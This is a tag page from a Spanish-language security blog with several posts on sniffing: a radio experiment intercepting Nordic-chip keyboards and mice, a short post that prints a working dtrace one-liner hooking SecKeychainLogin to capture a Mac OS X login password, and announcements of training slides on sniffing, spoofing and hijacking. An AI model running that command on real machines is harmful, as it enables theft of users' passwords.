Este blog ya no está activo, sigue informándote aquí:

Mostrar todo
Mostrando entradas con la etiqueta Sniffing. Mostrar todas las entradas
Mostrando entradas con la etiqueta Sniffing. Mostrar todas las entradas

miércoles, 28 de septiembre de 2016

Nordic Chip Sniffer

Este experimento lo vi hace unos días,  pero no sabia que hacia realmente y aun no lo acabo de entender del todo, pero si que despierta esa parte de mi que quiere meterse en el mundo de las señales de radio. Si, lo se quiero meter las narices en demasiados sitios y al final no acabo profundizando en nada. Pero soy así y me gusta solventar mis dudas cuando me pica la curiosidad. 


Bueno, al tema, [0xroot] ha conseguido obtener información de los chips Nordic (mas concretamente el [nRF24L01]) de teclados y ratones esnifando la información a través de Software Defined Radio, [gnuradio] y Wireshark. Aunque no he podido acabar de entender que tipo de información ha podido obtener de el chip (Si alguien lo sabe que me lo ponga en las comentarios please), si que se be que llega algo por UDP y se puede entender que el teclado y el mouse están siendo utilizados. 

Enlace al experimento:

En mi opinión este "experimento" es ejemplo genial de como cogiendo varias herramienta y combinando las con la habilidad propia se puede conseguir cosas tan geniales como esta.  A mi me ha apasionado la verdad, aquí tenéis un vídeo donde 0xroot se graba realizando la PoC  del experimento. 


Curiosidad ++ 

Sed Buenos ;) 

Publicado por en No hay comentarios:
Etiquetas , , ,

miércoles, 24 de junio de 2015

Un Sniffer Para Apple Mac OS X En 140 Caracteres.

Hoy, ya que es un día de fiesta, me he decidido ha hacer una entrada mas normal fuera del Road To The CEH, así que me he decidido a curiosear mis redes sociales a la búsqueda de alguna noticia, articulo o paper que me llamara la atención. 


Pero, que hay mas curioso que un Sniffer cuyo comando de ejecución cabe en menos de 140 caracteres (138 para ser exactos, vamos un Tweet). Este Sniffer funciona en local y solamente en Mac OS X. Ya hay algunas versiones confirmadas, os las detallo mas abajo. 

Código del Sniffer: 

sudo dtrace -n 
'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')

Solo necesitaríamos ejecutar el "código" bloquear nuestro Mac y ver como ha sido capaz de sacar nuestra contraseña.

Versiones confirmadas de Mac OS X:
  • 10.10
  • 10.11β2
  • 10.9.5.
  • 10.10.3.
Fuente: 
Publicado por en No hay comentarios:
Etiquetas , , , , ,

martes, 23 de septiembre de 2014

Slide.- (Sniffing, Spoofing y Hijacking) Advance Edition

Hoy, a tres clases de acabar la formación, hemos entrado en el mundo del Sniffing, Spoofing y del Hijacking y como quería profundizar un poco mas en cada uno de ellos y también quería que vieran los tipos de Spoofing y Hijacking pues, he creado es slide llamada Advance Edition en un alarde de fantasía y creatividad. La verdad es que la slide es algo densa y que algunos me han preguntado si subiría las Slides a este blog. Así que, os la dejo por aquí y ya sabéis que si hay alguna cosa para mejorar no dudéis en decirlo por lo comentarios. 


Para los que también me han preguntado por las anteriores y por el tema de las "chuletas" y para los que queráis profundizar un poco mas en el mundo de la Seguridad Informática. Os dejo el ssiguienteenlace a este blog para que podáis ver el Pack Completo de estas slides. 
Espero que os gusten y Sed Buenos ;) 
Publicado por en No hay comentarios:
Etiquetas , , , , , ,

sábado, 26 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [7] (Protección: Sniffing, Spoofing y Hijacking)

Viernes por la noche/sábado por la mañana y hoy acabo con estas Slides, espero que os hayan gustado y también os voy a dejar una versión con todas las Slides juntas para aquellos que no queráis tragaros las 7 entradas. 

Hoy he hablado sobre medidas de Protección frente al Sniffing, Spoofing y Hijacking todas utilizando el sentido común y espero desarrollar la parte técnica a través de las practicas. También hay muchas medidas de protección que se nombran en otros puntos de la misma formación por lo que no pienso ser repetitivo. 

Espero que os guste: 


Aquí os dejo el pack completo para que me deis vuestra opinión (56 Diapositivas, se dice rápido):


"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."
Sed Buenos ;) 
Publicado por en No hay comentarios:
Etiquetas , , , , , , , , ,

jueves, 24 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [6] (Sniffing, Spoofing y Hijacking)

Hoy toca hablar de Sniffing, Spoofing y Hijacking. La verdad es que me ha costado un poco montar estas Slides y si fuera por mi lo explicaría todo desde un enfoque mas básico. (Lo cual dependiendo del nivel que vea si que lo haré) Bueno, dicho esto, espero que os guste.  Los que llevais tiempo en el mundo de la seguridad informática no os vendrá de nuevo pero a los que os esta gustando y queréis aprender un poco mas quizás si.

Os dejo la Slide aquí: 


Ojo, el tocho manual aun no está actualizado ya que he de empaparme bien de las herramientas de auditoria IDEA y ACL. 
"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."
Sed Buenos ;) 

Publicado por en No hay comentarios:
Etiquetas , , , , , , , ,
Suscribirse a: Entradas (Atom)